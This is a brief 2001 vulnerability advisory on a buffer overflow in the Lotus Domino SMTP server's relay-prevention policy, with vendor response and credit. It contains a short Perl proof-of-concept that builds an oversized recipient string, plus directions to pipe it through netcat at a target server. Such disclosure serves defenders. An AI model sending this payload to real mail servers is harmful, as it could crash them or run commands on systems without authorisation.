Lotus Domino Notes Vulnerable To Buffer Overflow

Reported January 23, 2001, by S.A.F.E.R.

VERSIONS AFFECTED

DESCRIPTIONLotus Domino SMTP Server contains a policy feature that you can use to prevent email relaying. However, a malicious attacker can use a vulnerability in this policy feature to overflow the buffer and possibly launch arbitrary commands.

DEMONSTRATION

S.A.F.E.R. supplied the following proof-of-concept code:

-- cut --

#!/usr/bin/perl

$req="a" . "%A"x200 . "A"x600 . "%[email protected]";

print "ehlo foomail from: [email protected]

to:$reqdatafoo.quit";

-- cut --

Simply replace “allowed.domain.com” with the domain name running Lotus Notes SMTP Server, and pipe the output through netcat.

VENDOR RESPONSE

Lotus was informed of this vulnerability on November 2, 2000, and has fixed this issue in release 5.06.

CREDITDiscovered by S.A.F.E.R.